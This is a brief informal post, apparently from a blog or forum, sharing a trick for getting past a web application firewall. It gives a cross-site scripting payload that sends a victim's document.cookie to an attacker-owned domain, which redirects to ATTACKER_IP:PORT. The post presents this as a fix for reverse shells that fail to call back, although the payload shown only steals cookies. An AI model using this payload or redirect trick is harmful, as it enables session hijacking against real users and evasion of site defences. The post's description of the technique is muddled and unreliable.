I came across this bypass on x.com. I wish I could remember who made the post but to whom ever you are shout out to you. If you are ever trying to do a reverse shell and it does not call back to your machine what you can do is use a redirect on a webpage you own. So lets say you own abc.com, you can make a redirect so when you send your payload it would look something like the following: " ' \<img src=x onerror=this.src='https://abc.com/payload/?'+document.cookie;>' --
So what would happen is you set up your redirect on your website. abc.com/payload would redirect to ATTACKER_IP:PORT. That way you are doing a bypass because the WAF is actually just checking that the address that it is going to has a DNS record. I thought this was pretty cool and a fun little work around as many of us have websites of our own.